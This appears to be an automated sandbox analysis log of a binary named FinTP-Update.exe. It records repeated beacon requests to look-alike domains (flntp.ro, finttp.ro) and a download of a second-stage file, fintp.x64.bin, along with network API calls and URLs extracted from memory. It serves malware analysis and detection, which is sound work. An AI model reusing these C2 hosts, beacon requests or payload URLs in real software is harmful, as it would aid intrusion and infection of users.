          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: unknown
          UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\FinTP-Update.exe
          Code function: 0_2_00007FF7193C1270 memcmp,_invalid_parameter_noinfo_noreturn,memcpy,memcmp,_invalid_parameter_noinfo_noreturn,memcpy,memchr,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,socket,inet_addr,gethostbyname,inet_addr,gethostbyaddr,htons,connect,closesocket,send,memset,recv,realloc,memcpy,memset,recv,strstr,strstr,memcpy,strncpy,closesocket,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7193C1270
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /fintp.x64.bin HTTP/1.0Host: www.flntp.ro
          Source: global trafficDNS traffic detected: DNS query: www.flntp.ro
          Source: global trafficDNS traffic detected: DNS query: www.finttp.ro
          Source: FinTP-Update.exeString found in binary or memory: http://www.flntp.ro/fintp.x64.bin
          Source: FinTP-Update.exe, 00000000.00000002.3357638321.00000018C64FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.flntp.ro/fintp.x64.bin8Z:B
          Source: FinTP-Update.exeString found in binary or memory: http://www.flntp.ro/fintp.x64.binUpdating
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3358210766.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2199716524.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/
          Source: FinTP-Update.exe, 00000000.00000002.3358210766.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/de
          Source: FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/finttp.ro/rss/portallogin-gettask.htmlFt
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/html
          Source: FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.html
          Source: FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.html011b87bd06
          Source: FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlAwtd
          Source: FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlFt
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlP
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlRU
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlS
          Source: FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmler
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlhi%?
          Source: FinTP-Update.exe, 00000000.00000003.2199716524.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlk~
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlmt
          Source: FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlmw
          Source: FinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 
00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlople
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlr&)
